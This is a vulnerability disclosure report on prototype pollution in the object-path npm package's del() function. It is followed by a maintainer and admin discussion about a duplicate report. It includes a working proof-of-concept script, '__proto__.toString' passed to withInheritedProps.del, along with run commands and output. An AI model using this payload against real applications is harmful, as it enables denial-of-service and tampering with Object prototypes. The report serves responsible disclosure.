Prototype Pollution in mariocasciaro/object-path
Reported on
Sep 13th 2021
Description
object-path package is vulnerable to Prototype Pollution. The del() function fails to validate which Object properties it deletes. This allows attackers to modify the prototype of Object, causing the modification of default properties like toString on all objects.
Proof of Concept
Create the following PoC file:
// PoC.js
const objectPath = require('object-path');
console.log("Before : " + ({}).toString());
objectPath.withInheritedProps.del({}, '__proto__.toString');
console.log("After : " + ({}).toString());
Execute the following commands in the terminal:
npm i object-path # Install affected module
node poc.js # Run the PoC
Check the Output:
Before : [object Object]
console.log("After : " + ({}).toString());
^
TypeError: {}.toString is not a function
Impact
Affected versions of this package are vulnerable to Denial of Service (DoS) via the del function.
SECURITY.md
2 years ago
@admin please see the comment in https://github.com/mariocasciaro/object-path/issues/113
@mariocasciaro Can you please validate this report?
Use the mark as valid button to confirm this issue and confirm a fix when a fix is merged. Thank you.
@mariocasciaro - if you believe reports to be duplicate, feel free to mark them as invalid.
@admin They were both opened on the same day, which one should I mark as invalid?
This report was opened first, and so it would only be fair to reward this disclosure if the other is considered a duplicate.
I would recommend marking the other report as invalid and providing the reason as duplicate.
OK, thanks for the help. As a possible improvement to the platform it would be nice to see also the time when the disclosure was opened, not just the date.
@mariocasciaro - thanks for the request - we can sort this out for you!
Yes, it has already been assigned and will be published shortly!